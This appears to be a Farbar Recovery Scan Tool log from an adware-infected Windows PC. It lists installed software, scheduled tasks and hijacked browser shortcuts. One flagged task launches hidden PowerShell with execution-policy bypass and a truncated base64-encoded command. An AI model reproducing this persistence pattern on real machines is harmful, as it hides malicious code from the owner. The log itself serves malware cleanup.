Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 2.0.1 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 2.0.0 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.2.1 - Canon Inc.)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.3.6326 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.3.2527 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.3.2606 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dashlane (HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Dashlane) (Version: 4.1.0.99957 - Dashlane SAS)
Desktop-play 000.015020180 (HKLM-x32\...\dply_en_015020180_is1) (Version:  - DESKTOPPLAY) <==== ATTENTION
DVD Flick 1.3.0.7 (HKLM-x32\...\DVD Flick_is1) (Version: 1.3.0.7 - Dennis Meuwissen)
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Fitbit Connect (HKLM-x32\...\{E54705FB-98A6-4C03-B2DC-D8C3B5486DCD}) (Version: 2.0.0.6512 - Fitbit Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HP 3D DriveGuard (HKLM\...\{54CE68A8-4F2D-4328-B1F7-D6C720405F7F}) (Version: 4.2.9.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{59F8C5AA-91BD-423D-BF05-09A80F39898F}) (Version: 2.10.62 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{E5823036-6F09-4D0A-B05C-E2BAA129288A}) (Version: 3.0.6 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\{4BACA3B8-F63A-44ED-9A8D-48B4D02AD268}) (Version: 6.0.100.276 - Hewlett-Packard)
HP SimplePass Identity Protection (HKLM-x32\...\InstallShield_{E6CB67CC-71D2-46b9-8D43-A4641A9EECB2}) (Version: 6.5.5.20 - Egis Technology Inc.)
HP Software Framework (HKLM-x32\...\{835B275B-F29B-464B-BD4B-097FD55FAB0A}) (Version: 4.6.8.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{23CCE784-A812-4647-AEFF-1DCCD4E57478}) (Version: 11.50.0000 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6425.0 - IDT)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.292.3 - McAfee, Inc.)
Media Suite (x32 Version: 10 - CyberLink Corp.) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
Norton Security (HKLM-x32\...\NS) (Version: 22.5.5.15 - Symantec Corporation)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
PhraseProfessor (HKLM-x32\...\{392277E3-5CF0-4F20-8BB5-F360D0DE4B41}) (Version: 2.0.0.490 - Phrase Professor) <==== ATTENTION
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.2.0 - Ralink)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.29034 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version:  - ) <==== ATTENTION
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.95 - Synaptics Incorporated)
Validity WBF DDK (HKLM\...\{1F91C200-8F0F-4009-A75E-DB6CE151BD4E}) (Version: 4.4.234.0 - Validity Sensors, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Wondershare Video Converter Free(Build 6.5.1.0) (HKLM-x32\...\Wondershare Video Converter Free_is1) (Version: 6.5.1.0 - Wondershare Software)
Yahoo Browser Settings (HKLM-x32\...\Yahoo Browser Settings) (Version:  - Yahoo! Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0233CBA7-CF8D-47C8-AAE0-15C5520BF73A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {099EA545-0C53-45B7-AB54-CA2018855CAF} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
Task: {13815AA9-590B-4C49-9953-A7B006907A7C} - System32\Tasks\{D1996BD7-8FB6-7614-566B-6FE1DB83922B} => C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation)
Task: {164BC185-5AC3-49DD-9D98-0BA405318464} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {1BEA3822-8B93-4F5B-B436-4811FCB531F5} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2012-11-05] (Hewlett-Packard Development Company, L.P.)
Task: {1C58E21A-1171-40B6-B0B7-1546A27AA771} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2012-07-24] (CyberLink Corp.)
Task: {2BDE1E7E-8AA4-4DDB-82C2-DB181FDEED54} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-09] (Adobe Systems Incorporated)
Task: {37FDB4B4-6F58-489C-8711-7C16755A4F51} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {49AB09C4-19DF-4844-B998-467FA3B28176} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {52A76F52-D07F-4BA4-BBA5-AEFB8BDDE6A6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {623470E2-C48A-4E52-A1DF-F77930E10D52} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-09] (Microsoft Corporation)
Task: {650AE430-76EB-45EE-9683-D326DBD65FEA} - System32\Tasks\{7E7E0F47-097E-080A-0911-0E7E057A117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9372 more characters).
Task: {69B68B87-4EE3-45A7-A72C-A1EFFF4CEBC1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {78A8E711-9886-4157-AE31-7E585AAB241A} - System32\Tasks\[email protected] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-09-20] (Adobe Systems Incorporated)
Task: {82B26FB7-DABB-47F1-8079-1229C6C723B6} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {8320D12B-9A3D-426A-BE5D-C9473998057E} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {8ED39B48-87B2-45B8-9B4A-7E3A4A3DEF49} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {926DF571-83F8-4B67-B099-E0CDE2A8E9B0} - \DNSKALAMAZOO -> No File <==== ATTENTION
Task: {96B45D1F-D133-4A3A-95CD-6BF63DBC0718} - System32\Tasks\Digital Sites => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {9D71B00E-3092-4BC0-8F6B-D6DA41E8DC2F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {A6D352C7-BEDD-458F-81CB-152C8FEBAC74} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {AC20895B-0994-4365-8AE9-4EA91DCA9545} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\WSCStub.exe [2015-11-20] (Symantec Corporation)
Task: {B0286D41-AF85-4532-AD16-2B5402FE5DE7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {B2AF2465-3FB6-4AB9-8916-8064970A2792} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {D0FDAB6C-C95E-48AB-AA04-97C7CBD08F91} - System32\Tasks\Atofcuuu => C:\Program Files\Phrase Professor191220150009\Aluts.bat [2015-12-18] ()
Task: {D86DF6B7-284C-409B-9B28-1DD55045DF4E} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {DD03D11B-03BD-4AD8-A57F-49D7F5FBD8A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E4FAE6DB-741C-4D03-88F4-5CF3AD1ED864} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {F4362C16-5DD8-45CC-BFF8-0DE20551FD7B} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {F46D7244-6DB6-42B8-9D4C-734C1F747184} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {FBE6FA96-A961-4CE0-A0B4-89A6B663D7BA} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {FC1EC4B9-E68E-48D4-B596-73DA09BA7009} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\Digital Sites.job => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\levilaing\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
ShortcutWithArgument: C:\Users\levilaing\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
ShortcutWithArgument: C:\Users\levilaing\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,

==================== Loaded Modules (Whitelisted) ==============

2015-12-18 17:45 - 2015-12-18 16:11 - 00375144 _____ () C:\WINDOWS\system32\Qacsauol64.dll
2015-10-30 01:18 - 2015-10-30 01:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-09-28 19:29 - 2012-03-27 21:49 - 00140456 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2015-12-18 16:11 - 2015-12-18 16:11 - 00178536 _____ () C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe
2012-09-06 03:47 - 2012-09-06 03:47 - 00028160 _____ () C:\Windows\system32\valWBFPolicyService.exe
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2009-01-21 16:45 - 2009-01-21 16:45 - 01401856 _____ () C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\x64\LIBEAY32.dll
2015-07-09 17:11 - 2013-03-25 09:57 - 00727952 _____ () C:\WINDOWS\SysWOW64\WSCM64.dll
2013-06-07 05:16 - 2013-06-07 05:16 - 04073768 _____ () C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
2015-12-19 20:59 - 2015-12-19 20:59 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-13 06:11 - 2016-02-29 09:24 - 00227712 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe
2016-01-13 06:11 - 2016-02-29 09:24 - 00285568 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe
2016-01-12 12:12 - 2016-01-04 19:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-12 12:12 - 2016-01-04 19:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-27 17:28 - 2016-01-15 23:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-27 17:28 - 2016-01-15 23:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-03-03 20:46 - 2016-03-03 20:50 - 00016384 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.302.8200.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2016-03-03 20:46 - 2016-03-03 20:50 - 16062976 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.302.8200.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2016-03-03 20:46 - 2016-03-03 20:54 - 00291328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.302.8200.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll
2015-12-19 20:59 - 2015-12-19 20:59 - 00064512 _____ () C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Microsoft.CloudExperienceHost.dll
2016-03-07 10:34 - 2016-03-07 10:35 - 00015360 _____ () C:\Program Files\WindowsApps\Microsoft.BingSports_4.8.268.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Sports.exe
2016-03-08 08:53 - 2016-03-08 08:53 - 00013824 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_2.6.16.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
2016-03-08 08:53 - 2016-03-08 08:53 - 06197760 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_2.6.16.0_x64__8wekyb3d8bbwe\WhatsNew.Store.dll
2015-10-30 01:18 - 2015-10-30 01:18 - 02100064 _____ () C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
2016-01-21 12:55 - 2016-01-21 12:55 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2013-11-04 10:17 - 2012-06-07 21:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2012-06-08 11:34 - 2012-06-08 11:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2012-12-20 18:30 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
2014-10-28 11:22 - 2014-10-28 11:22 - 40622592 ____R () C:\Program Files (x86)\Fitbit Connect\libcef.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00344448 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWDebugDll_win32.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00434560 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWDebug.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00467328 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWUtils.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 32689536 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWExternLib.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00299392 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLib_win.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 06182784 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWData.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 07427456 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWApplication.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 13638016 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLib.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 02259840 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLibData.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00353664 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\Kwift_DP.4.1.0.99957.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2016-03-07 10:34 - 2016-03-07 10:35 - 12646400 _____ () C:\Program Files\WindowsApps\Microsoft.BingSports_4.8.268.0_x86__8wekyb3d8bbwe\Microsoft.Msn.Sports.dll
2015-09-09 06:59 - 2015-09-09 06:59 - 00645120 _____ () C:\Program Files\WindowsApps\Microsoft.BingSports_4.8.268.0_x86__8wekyb3d8bbwe\Microsoft.Aria.ClientTelemetry.dll
2016-03-07 10:34 - 2016-03-07 10:35 - 00938496 _____ () C:\Program Files\WindowsApps\Microsoft.BingSports_4.8.268.0_x86__8wekyb3d8bbwe\SQLite3Wrapper.dll
